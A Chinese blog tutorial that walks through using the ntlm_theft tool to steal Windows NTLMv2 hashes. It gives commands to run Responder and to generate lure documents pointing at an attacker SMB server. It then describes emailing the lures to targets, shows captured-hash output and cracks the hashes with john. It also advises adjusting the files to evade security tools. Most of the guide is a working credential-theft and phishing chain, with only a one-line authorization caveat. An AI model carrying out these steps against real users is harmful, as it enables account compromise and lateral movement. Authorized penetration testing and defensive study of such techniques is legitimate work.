使用 ntlm_theft 生成各种类型的 NTLMv2 哈希窃取文件

最新推荐文章于 2025-08-24 17:01:19 发布
原创 最新推荐文章于 2025-08-24 17:01:19 发布 · 785 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #哈希算法 #网络安全 #渗透测试

在网络安全领域,尤其是渗透测试和红队活动中,窃取目标系统的 NTLMv2 哈希是一种常见的技术手段。这些哈希可以被用于进一步的攻击,例如密码破解或“传递哈希”(Pass-the-Hash)攻击。为了简化这一过程,Jacob Wilkin 开发了一款名为 ntlm_theft 的工具,项目地址如下:https://github.com/Greenwolf/ntlm_theft。该工具能够快速生成多种类型的文件,用于诱导目标用户泄露其 NTLMv2 哈希。本文将详细介绍如何使用 ntlm_theft,包括其功能、安装方法、使用场景以及实际操作步骤。

一、什么是 ntlm_theft?

ntlm_theft 是一款由 Python 编写的开源工具,旨在帮助安全研究人员和渗透测试人员生成多种类型的文件,这些文件在被目标用户打开或交互时,会触发对攻击者控制的 SMB(Server Message Block)服务器的连接请求。由于 Windows 系统默认会在这种情况下自动发送用户的 NTLMv2 哈希,攻击者可以通过捕获这些哈希来实现进一步的利用。

该工具的主要特点包括:

  • 多样化的文件类型:支持生成多种文件格式,例如 .docx.xlsx.pdf.rtf 等,共计 21 种不同的文件类型(截至最新版本)。
  • 简单易用:通过命令行参数即可快速生成所需文件,无需手动配置复杂的攻击载荷。
  • 针对性设计:主要面向内部网络钓鱼测试,也可以用于外部钓鱼(如果目标网络允许出站 SMB 流量)。
  • 兼容性:在现代 Windows 系统(如 Windows 10)上经过测试,部分文件类型甚至对旧系统仍然有效。

ntlm_theft 的典型使用场景包括:

  • 渗透测试中快速验证目标网络的安全配置。
  • 测试防病毒软件和邮件网关对恶意文件的检测能力。
  • 红队活动中模拟真实的钓鱼攻击。

二、安装与环境准备

要在本地使用 ntlm_theft,需要完成以下准备工作:

  1. 克隆 GitHub 仓库
    使用 git 命令将 ntlm_theft 仓库下载到本地:

    git clone https://github.com/Greenwolf/ntlm_theft.git

    然后进入项目目录:

    cd ntlm_theft

  2. 安装依赖
    ntlm_theft 需要 Python 3 环境,并且部分功能依赖额外的库。对于生成 .xlsx 文件的攻击,需要安装 xlsxwriter

    pip3 install xlsxwriter

    其他功能无需额外依赖,只需确保 Python 3 已正确安装。

  3. 准备 SMB 捕获工具
    ntlm_theft 本身仅负责生成文件,捕获 NTLMv2 哈希需要配合工具如 ResponderImpacket 的 SMB 服务器。例如,安装并运行 Responder

    sudo apt install responder
sudo responder -I eth0

    Responder 将监听网络接口,捕获目标发送的 NTLMv2 哈希。

三、使用 ntlm_theft 生成文件

ntlm_theft 的核心功能是通过命令行参数生成特定类型的文件。以下是基本用法和示例:

1. 基本命令格式

python3 ntlm_theft.py -g <文件类型> -s <服务器IP> -f <文件名>
  • -g:指定要生成的文件类型,可以是 all(生成所有类型)、modern(仅生成适用于现代 Windows 的类型)或具体类型(如 docxxlsx)。
  • -s:指定攻击者控制的 SMB 服务器 IP 地址。
  • -f:指定生成文件的基础名称,工具会在此基础上添加后缀。

2. 示例操作

示例 1:生成所有类型文件

假设攻击者的 Kali Linux 机器 IP 为 192.168.1.100,我们希望生成所有支持的文件类型:

python3 ntlm_theft.py -g all -s 192.168.1.100 -f test

运行后,工具会在 test 文件夹中生成多种文件,例如:

  • test/test.scf
  • test/test-(includepicture).docx
  • test/test-(externalcell).xlsx
  • test/test.pdf

每种文件的用途和触发方式会在生成时显示,例如:

  • (BROWSE):浏览文件夹时触发。
  • (OPEN):打开文件时触发。
  • (OPEN IN WINDOWS MEDIA PLAYER ONLY):需用特定软件打开。
示例 2:生成适用于现代 Windows 的文件

某些文件类型(如 .scf)在现代 Windows 上已失效,可以使用 modern 参数筛选:

python3 ntlm_theft.py -g modern -s 192.168.1.100 -f meeting

输出示例:

Skipping SCF as it does not work on modern Windows
Created: meeting/meeting-(url).url (BROWSE TO FOLDER)
Created: meeting/meeting-(includepicture).docx (OPEN)
Created: meeting/meeting-(externalcell).xlsx (OPEN)
示例 3:生成特定类型文件

如果只想生成 Excel 文件:

python3 ntlm_theft.py -g xlsx -s 192.168.1.100 -f bonus

输出:

Created: bonus/bonus-(externalcell).xlsx (OPEN)

四、实际攻击流程

以下是一个完整的攻击示例:

  1. 启动 Responder
    在攻击者机器上运行:

    sudo responder -I eth0

  2. 生成恶意文件
    使用 ntlm_theft 生成一个 .docx 文件:

    python3 ntlm_theft.py -g docx -s 192.168.1.100 -f report

  3. 分发文件
    将生成的 report/report-(includepicture).docx 通过邮件或共享文件夹发送给目标用户。

  4. 捕获哈希
    当目标用户打开文件时,Word 会尝试连接 192.168.1.100 的 SMB 服务器,Responder 将捕获类似以下的输出:

    [SMB] NTLMv2-SSP Hash : user::DOMAIN:1122334455667788:ABCDEF0123456789ABCDEF0123456789:0101000000000000...

  5. 破解哈希
    使用工具如 John the RipperHashcat 对捕获的哈希进行破解:

    john --format=netntlmv2 hash.txt

五、使用场景与注意事项

使用场景

  • 内部钓鱼:测试员工对恶意文件的警惕性。
  • 安全评估:检查网络是否允许出站 SMB 流量。
  • 防御测试:验证防病毒软件或邮件网关的检测能力。

注意事项

  • 合法性:仅在授权的渗透测试中使用,切勿用于非法目的。
  • 网络限制:外部攻击需目标网络允许出站 SMB 流量(端口 445)。
  • 检测规避:生成的文件可能被某些高级安全工具标记,需根据目标环境调整策略。

六、总结

ntlm_theft 是一款功能强大且易于使用的工具,通过自动化生成多种类型的 NTLMv2 哈希窃取文件,大大提高了渗透测试的效率。无论是用于内部安全评估还是红队演练,它都能帮助安全从业者快速验证目标系统的弱点。同时,配合 Responder 等工具,它可以无缝融入完整的攻击链。

如果你对网络安全测试感兴趣,不妨尝试 ntlm_theft,并根据实际需求调整其应用方式。通过合理使用这一工具,不仅能提升测试效率,还能为企业网络安全提供更有价值的洞察。

java+ntlmv2_审核事件将身份验证包显示为 NTLMv1 而不是 NTLMv2
weixin_39612653的博客
03-05 449
审核事件将身份验证包显示为 NTLMv1 而不是 NTLMv209/14/2020本文内容本文讨论身份验证实际使用 NTLMv2 但在事件日志中报告 NTLMv1 的问题。原始产品版本: Windows Server 2012 R2原始 KB 编号: 2701704摘要在域中的所有计算机上使用 lmcompatibilitylevel 3 或更高版本,以强制客户端仅使用 NTLMv2。 在按 ...
ntlm_theft:Jacob Wilkin(Greenwolf)生成多种类型的NTLMv2哈希盗窃文件的工具
03-19
用于生成多种类型的NTLMv2哈希盗窃文件的工具。 ntlm_theft是一个开源Python3工具,可生成21种不同类型的哈希盗窃文档。当目标允许网络外的smb流量,或者您已经在内部网络中时,这些可用于网络钓鱼。 与基于宏的...
使用 Outlook 窃取 NetNTLMv2 哈希
aihua002的博客
06-24 444
如果目标系统没有运行最新版本的 Windows/Outlook,则可以制作这样的电子邮件,允许攻击者窃取受害者的 NetNTLMv2 哈希值,而无需用户进行任何交互 - 单击电子邮件预览它足以窃取哈希值。
Windows 环境中使用 Responder 窃取 NTLMv2 哈希并利用
子曰小玖的博客
04-24 1126
Responder工具 Responder下载地址:https://github.com/lgandx/Responder Responder工具可以污染LLMNR和NBT-NS请求。 首先假设连接到Windows活动目录环境(Windows Active directory),当网络上的设备尝试用LLMNR和NBT-NS请求来解析目的地机器时,Responder就会伪装成目的地机器。当受害...
java ntlm,在Java中验证NTLMv2身份验证
weixin_39630762的博客
02-12 542
So I'm trying to track down a strange bug with NTLMv2 and Java. It seems like NTLM is ignoring any information I pass in during the Java based authentication, and finds the information somewhere else....
WEB安全--内网渗透--利用Net-NTLMv2 Hash
m0_74800552的博客
04-07 1885
在前两篇文章中分析了NTLM协议中Net-NTLMv2 Hash的生成、如何捕获Net-NTLMv2 Hash,现在就来探讨一下在内网环境中,如何利用Net-NTLMv2 Hash进行渗透。
流量包NTLMv2的Net-NTLM Hash破解
shao65308的专栏
11-07 1551
客户端接收到Type2消息后,使用用户的NTLM Hash对Challenge进行加密得到Net-NTLM Hash(不能直接用来进行PTH,但可以通过暴力破解来获取明文密码),封装到Type3 消息中,发给服务端.服务端接收到Type3消息后,用自己的密码对NTLM-Hash对Challenge进行加密,并比较自己计算出的Net NTLM Hash与客户端发送的是否匹配,如果匹配则认证成功,否则认证失败.首先客户端向服务端发送Type1消息去协商需要认证的主体,用户,机器以及需要使用安全服务等信息.
NTLMv2 离线爆破
anddddoooo的博客
12-18 800
攻击者(kali):192.168.72.162受害者(administrator):192.168.72.163因为 NTLM 身份验证是通过计算正确的挑战值得出的,所以如果我们能获取域用户的 NTLM 认证某一服务的 Net-NTLM v2 Hash 就能保存下来,离线破解。
WEB安全--内网渗透--捕获NET-NTLMv2 Hash
m0_74800552的博客
04-07 1410
我也觉得很复杂,但是没办法,这就是网络安全
Make sure that ntlm_auth >= 3.0.25 is in your path
微电子学与固体电子学-俞驰
08-01 6516
用wine运行游戏出现: 0041:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution 解决方案: apt-get install winbind ...
ntlm_theft工具:生成NTLMv2哈希盗窃文件的方法
ntlm_theft是一个专门用来生成多种类型的NTLMv2哈希盗窃文件的工具,由Jacob Wilkin(GitHub账号为Greenwolf)开发。这款工具能够创建21种不同的哈希盗窃文件,开发者通过这种工具展示了NTLMv2中存在的安全漏洞。 #...
ntml.rar_NTLM_NTML_ntlm算法_ntml协议认证_ntml认证
09-23
NTLM(NT LAN Manager)是Windows操作系统中使用的一种身份验证协议,主要负责在网络环境中提供安全认证服务。在本文中,我们将深入探讨NTLM的工作原理、挑战模式、散列认证过程以及NTLM算法的实现。 NTLM协议是...
NTLM.ZIP_DELPHI NTLM_NTLM Authentication_authentication
09-23
`WinDefines.inc`和`WinType.pas`文件可能包含了Windows API的常量定义和类型声明,这对于正确地调用Windows API函数至关重要。它们可能包含NTLM相关的常量,例如`SECURITY_STATUS`错误代码,以及`SECURITY_INTEGER`...
pwdump6-1.2.0.zip_ grabber_NTLM_password_pwdump 6 src_pwdump6.ex
09-22
pwdump6 - Windows NT/2000/XP/2003 NTLM and LanMan Password Grabber
Java Stream API详解
最新发布
ZNing_1的博客
08-24 169
本文详解Java 8 Stream API,涵盖其核心概念(流、中间与终端操作)、多种创建方式、常用操作方法,并分析其声明式编程、并行处理等优势与注意事项,助你高效处理集合数据。
数据结构--2:ArrayList与顺序表
2301_81743879的博客
08-20 474
1.顺序表的创建在集合框架中,ArrayList是⼀个普通的类,实现了List接口,具体框架图如下:2.常见操作3.遍历4.扩容机制ArrayList是⼀个的顺序表,即:在插入元素的过程中会。
python中的生成
lch_001的博客
08-21 1216
生成器是按需生成数据的迭代器。用yield关键字创建生成器函数。用圆括号()创建生成器表达式。它们的主要优点是内存高效和延迟计算。如果你需要处理大量数据或者进行无限序列的操作,生成器是 Python 中一个非常有用的工具。
权限管理模块
yvya_的博客
08-23 350
本文介绍了基于RBAC(基于角色的访问控制)的权限管理系统设计与实现。系统采用用户-角色-权限三层架构,使用Java+Spring Boot+Spring Security技术栈实现。核心内容包括:1)数据库设计,包含用户、角色、权限实体及关联表;2)服务层实现用户权限查询和角色权限分配功能;3)通过实现UserDetailsService将用户权限信息集成到Spring Security框架中,实现接口级别的权限控制。系统通过角色代码(加ROLE_前缀)和权限标识进行细粒度的访问控制,适用于多用户多权限的
Java 泛型 T、E、K、V、?、S、U、V
GQ_666的博客
08-23 1019
Java泛型(Generics)是Java5引入的重要特性,通过在类、接口和方法中使用类型参数实现类型安全的代码复用。文章详细解析了T、E、K、V等常见泛型符号的含义与用法,介绍了泛型类、接口和方法的定义方式,以及通配符?的扩展用法(无界通配符、上限通配符、下限通配符)。还深入探讨了Type接口的实现类(Class、ParameterizedType等)在反射中的应用,并提供了多边界类型参数、通配符嵌套等高级写法示例。最后总结了泛型的使用注意事项,帮助开发者更好地理解和应用Java泛型特性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值